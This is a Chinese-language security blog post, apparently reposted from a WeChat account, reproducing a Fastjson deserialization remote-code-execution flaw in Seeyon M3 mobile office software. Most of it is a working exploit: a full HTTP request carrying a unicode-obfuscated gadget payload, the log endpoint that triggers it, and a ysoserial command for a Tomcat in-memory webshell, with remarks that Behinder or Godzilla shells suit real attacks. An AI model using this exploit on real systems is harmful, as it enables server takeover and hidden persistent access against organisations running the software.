漏洞原理和内存马利用其实早就有师傅分析过了,实际上是fastjson,想要进一步了解的话可以去原文章看看,我在这里引个路:https://xz.aliyun.com/t/13078
漏洞介绍
致远m3移动端是一款十分实用的办公软件,能与致远协同软件无缝连接的革命性、高端管理软件,很好的帮助用户进行全面的协同工作,真正实现"智慧协同,掌控由我" 。软件分别提供了公文、会议、任务、签到、文档、收藏、分享、行为绩效、任务、新闻、公告、调查、工资条、通讯录、日程等应用,让移动工作更方便高效。攻击者可通过RCE获取服务器权限。
漏洞利用
网上的payload,利用 CB1 生成 hex 反序列化数据,替换 POC 中的 HEX
POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Content-Type: application/jsonContent-Length: 3680[{"userMessageId":"{"@u0074u0079u0070u0065":"u0063u006fu006du002eu006du0063u0068u0061u006eu0067u0065u002eu0076u0032u002eu0063u0033u0070u0030u002eu0057u0072u0061u0070u0070u0065u0072u0043u006fu006eu006eu0065u0063u0074u0069u006fu006eu0050u006fu006fu006cu0044u0061u0074u0061u0053u006fu0075u0072u0063u0065","u0075u0073u0065u0072u004fu0076u0065u0072u0072u0069u0064u0065u0073u0041u0073u0053u0074u0072u0069u006eu0067":"u0048u0065u0078u0041u0073u0063u0069u0069u0053u0065u0072u0069u0061u006cu0069u007au0065u0064u004du0061u0070:HEX;"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}
再读取接口日志内容触发 Fastjson 反序列化/mobile_portal/api/systemLog/pns/loadLog/app.log
回显内存马
回显的马可以直接通过Y4er师傅改过的yso生成tomcat 回显内存马
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | xxd -p | tr -d 'n'
冰蝎内存马
但是实战中一般来说是生成一个冰蝎或者哥斯拉的内存马更为实用。payload太长了就不贴出来了,可以文章开头给的师傅的链接自己构造。也可以关注微信公众号回复20240710或者加入星球获取。
原文始发于微信公众号(良月安全):[漏洞复现]致远M3 RCE漏洞复现及内存马利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论